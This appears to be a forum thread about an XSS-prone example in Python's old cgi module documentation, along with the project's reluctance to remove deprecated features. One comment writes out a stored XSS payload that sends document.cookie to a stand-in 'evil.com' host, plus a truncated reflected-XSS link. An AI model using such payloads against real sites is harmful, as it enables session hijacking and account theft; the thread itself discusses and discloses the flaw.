Python's official documentation contains textbook example of insecure code (XSS)
seclists.org
seclists.org
Maybe it wouldn't survive that long if people opened issues for this sort of thing in appropriate places (perhaps https://github.com/python/docs-community ), rather than spontaneously expecting an underfunded open source project to think about the documentation of decades-old functionality that barely anyone would consider using for new code (and which has been removed in the latest version anyway).
(At this scale, or anywhere close to it, the only OSS orgs I would consider not underfunded are Linux and Mozilla. And if you count non-code Creative Commons stuff, Wikimedia.)
> Deprecated since version 3.11, will be removed in version 3.13
There's significant hysteresis in the project: a strong reluctance to remove things that they would never even remotely consider adding today if they didn't already exist. After all: if it already exists, someone might still be using it (and it's harder to gather that kind of information, the older the thing in question is); but adding it new would create a maintenance burden (never mind that the old rarely-used stuff doesn't really get maintained).
1. stored XSS (input is saved and later displayed)
Input is stored in a DB or a file and later displayed on the webpage, any future user viewing that page would also execute the malicious script.
Example: attacker submits <script>fetch('http://evil.com/steal?cookie=' + document.cookie)</script>. If this is stored and later displayed, it will run for all users.
2. Immediate XSS
If you can trick another user into clicking a malicious link containing the script, it will execute in their browser.
Eg.:
https://example.com/cgi-script?name=<script>fetch('http://ev...
If the CGI script prints this without sanitization, the victim's browser executes the script, jackpot you get their session cookies.
3. Browser Exploits
And for all of the above, you could use an XSS payload with a 0 day browser exploit to gain whatever privileges.
it’s definitely not being stored if it’s immediately printed like in the example , so that’s not a problem
and you don’t need a browser exploit for XSS to be a problem on its own, I just wasn’t sure if that example counts.